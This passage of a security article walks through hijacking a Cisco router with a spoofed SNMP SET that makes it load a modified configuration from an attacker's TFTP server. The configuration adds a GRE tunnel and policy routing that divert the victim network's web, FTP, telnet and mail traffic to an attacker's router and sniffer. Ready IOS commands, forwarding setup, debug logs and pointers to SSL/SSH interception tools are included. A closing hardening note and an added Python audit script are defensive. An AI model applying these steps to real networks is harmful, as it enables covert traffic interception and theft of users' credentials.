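    + "30 20 06 0f " + _CC_COL + "06 89 52 04 0d " + "router.config".encode().hex())
```

Feeding `config_copy_alert("192.168.1.5", "Ethernet0/0", SAMPLE_SET)` reproduces the article's case: a trusted-range source seen on the outside interface.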
GRE tunnel
GRE (Generic Routing Encapsulation) is a tunneling protocol designed to encapsulate arbitrary types of network layer packets within a network layer packet. One of the options for using GRE is to connect IPX network segments through a communication channel that supports only the network layer of the OSI model. In this case, you will need to create a GRE tunnel from one router to another to send IPX packets back and forth over an IP-only link.
However, we will use GRE for something other than its normal purpose. Our plan is as follows:
- Create a GRE tunnel from the attacked router to the hacker's router.
- Determine what traffic will pass through the tunnel.
- Unpack GRE packets coming from the attacked router and forward them to the attacker’s computer (sniffer) for analysis.
Attacked router
We need to create a GRE tunnel on the attacked router. Since we don't have access to a terminal (console), we can simply edit the configuration file we obtained and then send it back to the router using a fake SNMP SET request. Let's add the following lines to the configuration file of the attacked router:
interface tunnel0
 ip address 192.168.10.1 255.255.255.0
 tunnel source Ethernet0/0
 tunnel destination
 tunnel mode gre ip
They mean the following:
- We created an interface tunnel0 and specified an IP address from the network 192.168.10.x. To exchange data, both ends of the tunnel must be on the same subnet.
- We have indicated that the Ethernet0/0 interface is the start of the tunnel (otherwise, where would the tunnel start from?)
- The end of the tunnel is the IP address of the external interface of the hacker's router.
- The last command is not required, since a GRE tunnel is created by default anyway (but we added it to be sure).
Next, we define which traffic will pass through the tunnel. To do this, add a few more lines to the configuration file of the attacked router:
access-list 101 permit tcp any any eq 443
access-list 101 permit tcp any any eq 80
access-list 101 permit tcp any any eq 21
access-list 101 permit tcp any any eq 20
access-list 101 permit tcp any any eq 23
access-list 101 permit tcp any any eq 25
access-list 101 permit tcp any any eq 110
We have allowed data transfer via the SSL, HTTP, FTP, telnet, SMTP and POP3 protocols.
Now, if the traffic matches the rules described above, it will be redirected in accordance with the routing maps, the description of which must be added to the configuration file:
route-map divert-traffic
 match ip address 101
 set ip next-hop 192.168.10.2
interface Ethernet0/0
 ip policy route-map divert-traffic
This entry has the following meaning:
- We defined the routing map name (divert-traffic) and then used the 'match' command to specify that the match condition should be access rule set 101 (access-list).
- We specified the attacker's IP address as the next-hop address.
- We applied a routing map to the external LAN interface of the attacked machine. The result of this will be to monitor all incoming and outgoing Ethernet0/0 traffic.
Hacker's router
The configuration of the attacker's router is a little more complicated, since we must define two routing maps - one to forward traffic to the attacker's computer (sniffer), and another to send traffic back to the attacked router. It is very important that we send the tunneled data back to the attacked router so that the attacked computer (Victim Client) does not lose connection.
Let's start by creating a GRE tunnel on the attacker's router:
Attacker(config)# interface tunnel0
Attacker(config-if)# ip address 192.168.10.2 255.255.255.0
Attacker(config-if)# tunnel source Ethernet0/0
Attacker(config-if)# tunnel destination
Attacker(config-if)# tunnel mode gre ip
Attacker(config)# access-list 101 permit ip any any
Attacker(config)# route-map divert-to-sniffer
Attacker(config-route-map)# match ip address 101
Attacker(config-route-map)# set ip next-hop 192.168.3.5
Attacker(config-route-map)# exit
Attacker(config)# interface tunnel0
Attacker(config-if)# ip policy route-map divert-to-sniffer
These rules mean the following:
- We created an access rule that allows all types of traffic.
- We have created a divert-to-sniffer routing map (this routing map will redirect tunneled traffic to the sniffer).
- The created access rule is used as a match condition.
- We specified the IP address of the attacker (sniffer) as the next-hop address.
- We have applied the routing map to the tunnel0 interface.
Finally, let's create a routing map and associate it with the Ethernet0/0 interface:
Attacker(config-if)# route-map divert-out
Attacker(config-route-map)# match ip address 101
Attacker(config-route-map)# set ip next-hop 192.168.10.1
Attacker(config-route-map)# exit
Attacker(config)# interface ethernet0/0
Attacker(config-if)# ip policy route-map divert-out
These additional settings mean the following:
- After the attacker (sniffer) intercepts and forwards the tunneled data back, the divert-out routing map will redirect the traffic back to the attacked router.
- We applied the routing map to the Ethernet interface.
Attacker (sniffer)
After completing the configuration of the routers, we need to configure the attacker's computer (sniffer) to intercept and redirect data. It is important that the computer is configured to forward packets back. To do this, you can use one of the following commands:
root@whax:~# echo 1 > /proc/sys/net/ipv4/ip_forward
or
root@whax:~# fragrouter -B1
Without forwarding, our attack would cause a denial of service (DoS) on the computer being attacked and, accordingly, lose its meaning.
Let's start the attack
After all the settings are complete, all we have to do is upload the new, modified configuration file to the attacked router. The result will be the activation of the GRE tunnel and the redirection of all traffic from the attacked computer's local network to the hacker (sniffer). We need to create a fake SNMP SET request that will cause the router to download the new configuration file and merge it into its current configuration. To obtain the base packet we send the usual request again:
root@whax# ./merge-router-config.pl
######################################################
# Merge Cisco Router config - Using SNMP
# Hacked up by muts - [email protected]
######################################################
Usage: ./merge-copy-config.pl
Make sure a TFTP server is set up, preferably running from /tmp !
root@whax#
Let's intercept this packet and change the return IP address and some other fields in the packet header, as shown in Figure 5.
Figure 5. Changing the packet header.
After sending the modified packet, a TFTP connection will be created with our computer (Figure 6).
Figure 6. Connection to the attacker's TFTP server.
Pay attention to the TFTP read request (packet #2). The packet bypasses SNMP access rules, causing a new modified configuration file to be downloaded and added to the current configuration. Debugging information from the attacked router reveals a lot of interesting information about the progress of the attack:
*Mar 1 00:32:53.854: SNMP: Set request, reqid 36323, errstat 0, erridx 0
 ccCopyTable.1.2.12285992 = 1
 ccCopyTable.1.3.12285992 = 4
 ccCopyTable.1.4.12285992 = 1
 ccCopyTable.1.5.12285992 = 80.179.76.227 (the address of the TFTP server)
 ccCopyTable.1.6.12285992 = pwnd-router.config
 ccCopyTable.1.14.12285992 = 4
*Mar 1 00:32:53.971: SNMP: Response, reqid 36323, errstat 0, erridx 0
 ccCopyTable.1.2.12285992 = 1
 ccCopyTable.1.3.12285992 = 4
 ccCopyTable.1.4.12285992 = 1
 ccCopyTable.1.5.12285992 = 80.179.76.227 (the address of the TFTP server)
 ccCopyTable.1.6.12285992 = pwnd-router.config
 ccCopyTable.1.14.12285992 = 4
*Mar 1 00:32:54.291: SNMP: Packet sent via UDP to 192.168.1.5
Note that the TFTP server address differs from the attacker's IP address and is sent as a separate parameter. The tunnel is now open and ready for use, as diagrammed in Figure 7.
Figure 7. GRE tunnel.
You can check the functionality of the tunnel by sending a debugging command to the attacker’s router:
Attacker# debug tunnel
*Mar 3 06:38: Tunnel0: GRE/IP to classify 212.199.145.242 -> 80.179.20.55 (len=108 type=0x800 ttl=253 tos=0x0)
*Mar 3 06:38: Tunnel0: adjacency fixup, 80.179.20.55 -> 212.199.145.242, tos=0x0
*Mar 3 06:38: Tunnel0: GRE/IP to classify 212.199.145.242 -> 80.179.20.55 (len=108 type=0x800 ttl=253 tos=0x0)
*Mar 3 06:38: Tunnel0: adjacency fixup, 80.179.20.55 -> 212.199.145.242, tos=0x0
Suppose the attacked computer searched for the term "GRE Sniffing" on Google, as shown in Figure 8.
Figure 8. The victim is looking for information about GRE tunnels.
As a result of these actions, Ethereal on the attacker's computer will receive the packets shown in Figure 9.
Figure 9. Sniffer shows a Google query to search for information about GRE tunnels.
In addition to using a specialized sniffer (such as dsniff) to intercept plaintext passwords, we can carry out sophisticated man-in-the-middle attacks on the victim's computer. Ettercap is a good utility that, besides intercepting various types of passwords, allows a man-in-the-middle attack on the encrypted SSL and SSH protocols. Ettercap filters can be used to control and modify the traffic that passes through. The possibilities are virtually endless.
Conclusion
Sometimes things are not what they seem. When dealing with SNMP (or other UDP-based protocols), you always need to be aware of the nooks and crannies that, if overlooked, could lead to your network being compromised. In the example described, an additional access rule on the attacked router that explicitly defines the permitted TFTP server address would have been enough to thwart the attack.
Skeptics may ask, "How did the attacker know the RW community name and its access rules?" This information can be obtained by brute force, not only the community names but also the permitted IP addresses, and such a utility already exists.
The purpose of the article was to show not so much the effectiveness of the described attack as the potential gaps in UDP-based protocols. This in no way means that Cisco equipment is unsafe. Proper configuration should minimize the chances of bypassing the protection. Errors by network administrators are the main reason Cisco equipment is compromised.
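As an added example (not from the page's authors), the following Python script audits an IOS configuration for the weaknesses this page turns on: default community names, RW access without an access list, access-list entries that permit ranges instead of single hosts (the protection-methods list earlier), and the absence of an snmp-server tftp-server-list restriction, which is the IOS form of the TFTP-server access rule the conclusion recommends. The hardened configuration and its community names are constructed for the example; the weak one is condensed from the Victim router configuration shown above.

```python
"""Audit an IOS config for the SNMP weaknesses this page exploits: default community
names, RW access without an ACL, ACLs permitting ranges instead of single hosts, and no
restriction on which TFTP server an SNMP-triggered config copy may use. Added example."""
import re

# Condensed from the Victim router configuration shown earlier on this page.
VICTIM_CONFIG = """\
hostname Victim
access-list 1 permit 192.168.1.0 0.0.0.255
access-list 102 permit ip any any
snmp-server community public RO
snmp-server community private RW 1
"""

# Hardened counterpart (constructed): non-default names, one host per ACL entry,
# and snmp-server tftp-server-list pinning the copy target to the same host ACL.
HARDENED_CONFIG = """\
hostname Victim
access-list 10 permit host 192.168.1.5
snmp-server community k9Rt-mon-2xQ RO 10
snmp-server community k9Rt-cfg-7pL RW 10
snmp-server tftp-server-list 10
"""

def parse_standard_acls(cfg):
    """Map standard ACL number -> list of (address, wildcard) permit entries."""
    acls = {}
    for num, addr, wild in re.findall(r"^access-list (\d+) permit (\S+)(?: (\S+))?$", cfg, re.M):
        acls.setdefault(num, []).append((addr, wild or "0.0.0.0"))
    return acls

def audit_snmp(cfg):
    """Return a list of findings; an empty list means none of the checked weaknesses."""
    findings, acls = [], parse_standard_acls(cfg)
    for name, mode, acl in re.findall(r"^snmp-server community (\S+) (RO|RW)(?: (\d+))?$", cfg, re.M):
        if name.lower() in ("public", "private"):
            findings.append(f"{mode} community '{name}' uses a default name")
        if not acl:
            findings.append(f"{mode} community '{name}' has no access-list")
            continue
        for addr, wild in acls.get(acl, []):
            # 'host x' or a bare address with no wildcard is a single host; anything else is a range
            if addr == "any" or (addr != "host" and wild != "0.0.0.0"):
                findings.append(f"ACL {acl} for '{name}' permits a range ({addr} {wild}), not single hosts")
    if not re.search(r"^snmp-server tftp-server-list \d+$", cfg, re.M):
        findings.append("no snmp-server tftp-server-list: config copy via SNMP may target any TFTP server")
    return findings
```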
Information about hardening Cisco routers can be found at